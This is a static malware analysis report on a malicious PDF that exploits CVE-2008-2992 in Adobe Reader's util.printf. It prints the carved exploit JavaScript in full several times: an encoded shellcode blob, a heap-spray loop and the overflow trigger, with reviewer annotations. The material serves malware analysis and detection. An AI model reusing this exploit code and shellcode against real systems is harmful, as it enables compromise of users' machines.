Malicious PDF — malware analysis report

Static analysis result for SHA-256 73e85cc0b4689464…

MALICIOUS

PDF

1.95 MB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
MD5: 3edadb91a753a7dea160813119555b85 SHA-1: 844e666c0b4c5a7d5f30c2e30c2cdc19b753830f SHA-256: 73e85cc0b4689464d3bc0bd41dd07c7197acfcc49cca088ec9a5b2733b46aae7
308 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains embedded JavaScript that exploits the CVE-2008-2992 vulnerability in util.printf. The JavaScript is heavily obfuscated and appears designed to download and execute a secondary payload; the 'Js.Exploit.Shellcode-18' ClamAV detection on an extracted artifact (combined_document_js_000.js) supports this assessment. The ML classifier also strongly flagged this PDF as malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 7

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js
1370639215b8fc3675fbcad6d56dcc811046601404d07876f4209d20a9550f6e
pdf-javascript-stream PDF /JS object 13 at offset 0x3DC 2774 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the carved script body below is unchanged; comment lines were added.
// Stage layout of the carved CVE-2008-2992 (util.printf) exploit script, as the report's
// heuristics section describes it. Detection signals worth keying on: unescape() over
// %u-encoded data, string-doubling loops that stop at a fixed 0x60000 size, a large array
// of identical strings, and util.printf() called with an oversized width specifier.
// Stage 1: %u-encoded blob that unescape() turns into UTF-16 code units. The report's
// heuristics call this shellcode markers, and ClamAV flags the combined artifact
// (combined_document_js_000.js) as Js.Exploit.Shellcode-18.
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
                         "%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
                         "%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
                         "%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
                         "%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
                         "%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
                         "%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
                         "%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
                         "%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
                         "%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
                         "%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
                         "%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
                         "%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
                         "%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
                         "%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
                         "%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
                         "%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
                         "%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
                         "%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
                         "%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
                         "%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
                         "%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
                         "%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
                         "%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
                         "%uD586%u659B%u7BD0%u1DFE");
						 
// Stage 2: split string literal; the recovered stage generic_stage_recovery_000.js normalizes
// it to "%u0A0A%u0A0A". Splitting constants this way is a signature-evasion pattern.
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the 0x0A0A pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob are kept alive in one array.
// v0FN43s is assigned without var, i.e. an implicit global.
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: a roughly 290-digit numeric literal; JavaScript stores it as a double, so the
// exact digits are not preserved — it only needs to format to a very long string.
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 ("%45"+"000f" concatenates to "%45000f"): the long
// format-specifier argument the heuristics section ties to CVE-2008-2992, a stack buffer
// overflow in Adobe Reader. util is Acrobat's JavaScript API object, not a Node module.
util.printf("%45"+"000f",gipW5Eb);
javascript_obj0013_002.js
07074b660f49bbdf8cd510ad36af4789436a5978c48d6712900474ba3955f3de
pdf-javascript-stream PDF /JS object 13 at offset 0x402 524288 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the carved script body below is unchanged; comment lines were added.
// This carve (javascript_obj0013_002.js, 524288 bytes) starts with the same script as
// javascript_obj0013_001.js; the bytes after util.printf() are trailing PDF structure
// (endstream, the Info dictionary, xref, trailer), not JavaScript.
// Stage 1: %u-encoded blob that unescape() turns into UTF-16 code units; the heuristics
// section reports shellcode markers in the recovered stage.
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
                         "%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
                         "%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
                         "%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
                         "%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
                         "%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
                         "%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
                         "%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
                         "%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
                         "%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
                         "%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
                         "%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
                         "%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
                         "%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
                         "%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
                         "%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
                         "%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
                         "%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
                         "%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
                         "%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
                         "%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
                         "%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
                         "%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
                         "%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
                         "%uD586%u659B%u7BD0%u1DFE");
						 
// Stage 2: split literal that normalizes to "%u0A0A%u0A0A" (see generic_stage_recovery_002.js).
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the 0x0A0A pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob kept alive in one array.
// v0FN43s is assigned without var (implicit global).
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: roughly 290-digit numeric literal, stored as a double (exact digits not preserved).
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 ("%45"+"000f" -> "%45000f"): the long format-specifier
// argument the heuristics section ties to CVE-2008-2992 (Acrobat util API, not Node's util).
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_000.js
20f8728eab9317e1975e783f2ec7fc3df67d3ea717a0991933a8777e6ef9f00e
deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC 2021 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the recovered script body below is unchanged; comment lines were added.
// generic_stage_recovery_000.js: the split-literal-normalize pass applied to object 13 at 0x3DC.
// Same stages as javascript_obj0013_001.js, with the "+"-split string constants joined; this
// is the form signature matching should run against.
// Stage 1: %u-encoded blob decoded by unescape() (heuristics section: shellcode markers).
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892%uD586%u659B%u7BD0%u1DFE");
						 
// Stage 2: 0x0A0A pad (was "%u0"+"A0A%u"+"0A0A" in the raw carve).
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob kept alive in one array
// (v0FN43s is an implicit global).
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: roughly 290-digit numeric literal, stored as a double (exact digits not preserved).
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 (the raw carve had "%45"+"000f"): the long format-specifier
// argument the heuristics section ties to CVE-2008-2992 (Acrobat util API, not Node's util).
util.printf("%45000f",gipW5Eb);
generic_stage_recovery_001.js
a402a7f28ead9e1c42bdac9e0497d396240a967e699d47cbac1480e33ae81128
deobfuscated-js generic stage recovery null-collapse from JavaScript object 13 at offset 0x402 3410 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the recovered script body below is unchanged; comment lines were added.
// generic_stage_recovery_001.js: null-collapse pass over object 13 at 0x402. The 524288-byte
// carve shrank to 3410 bytes, consistent with the raw stream being padded with null bytes;
// the text is otherwise identical to javascript_obj0013_001.js. Trailing PDF structure
// (endstream, Info dictionary, xref, trailer) follows the script and is not JavaScript.
// Stage 1: %u-encoded blob decoded by unescape() (heuristics section: shellcode markers).
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
                         "%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
                         "%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
                         "%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
                         "%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
                         "%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
                         "%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
                         "%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
                         "%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
                         "%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
                         "%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
                         "%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
                         "%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
                         "%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
                         "%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
                         "%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
                         "%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
                         "%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
                         "%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
                         "%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
                         "%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
                         "%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
                         "%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
                         "%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
                         "%uD586%u659B%u7BD0%u1DFE");
						 
// Stage 2: split literal that normalizes to "%u0A0A%u0A0A" (see generic_stage_recovery_003.js).
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob kept alive in one array
// (v0FN43s is an implicit global).
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: roughly 290-digit numeric literal, stored as a double (exact digits not preserved).
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 ("%45"+"000f" -> "%45000f"): the long format-specifier
// argument the heuristics section ties to CVE-2008-2992 (Acrobat util API, not Node's util).
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_002.js
295fe86926195179319ab027ed4c6cab27ca303296fb945186e05f73bad4d782
deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 261769 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the recovered script body below is unchanged; comment lines were added.
// generic_stage_recovery_002.js: split-literal-normalize pass over object 13 at 0x402
// (261769 bytes, so the null padding of the raw stream was apparently not collapsed here).
// Same stages as the earlier carves with the "+"-split constants joined; trailing PDF
// structure after util.printf() is not JavaScript.
// Stage 1: %u-encoded blob decoded by unescape() (heuristics section: shellcode markers).
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892%uD586%u659B%u7BD0%u1DFE");
						 
// Stage 2: 0x0A0A pad (was "%u0"+"A0A%u"+"0A0A" in the raw carve).
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
// Size the filler so that filler + blob reaches a fixed 0x60000 (393216) characters.
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
// double the pad until it is at least exh8jb characters long
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
// qViE7Tw: first exh8jb characters of the pad; uIm38I7M: the remainder
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
// grow the filler until filler + blob fills 0x60000 characters
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
// Stage 3: heap-spray pattern — 1200 copies of filler+blob kept alive in one array
// (v0FN43s is an implicit global).
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
// Stage 4: roughly 290-digit numeric literal, stored as a double (exact digits not preserved).
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
// util.printf with width 45000 (the raw carve had "%45"+"000f"): the long format-specifier
// argument the heuristics section ties to CVE-2008-2992 (Acrobat util API, not Node's util).
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_003.js
324195f16ecf0e7981a7264f4f7d961c5472022679b7f9e4a6f5dc044b0c3b57
deobfuscated-js generic stage recovery null-collapse -> split-literal-normalize from JavaScript object 13 at offset 0x402 2657 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Reviewer annotations only: the recovered script body below is unchanged; comment lines were added.
// generic_stage_recovery_003.js: null-collapse followed by split-literal-normalize over
// object 13 at 0x402 (2657 bytes). This is the fully normalized form of the same script;
// trailing PDF structure after util.printf() is not JavaScript.
// Stage 1: %u-encoded blob decoded by unescape() (heuristics section: shellcode markers).
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892%uD586%u659B%u7BD0%u1DFE");
						 
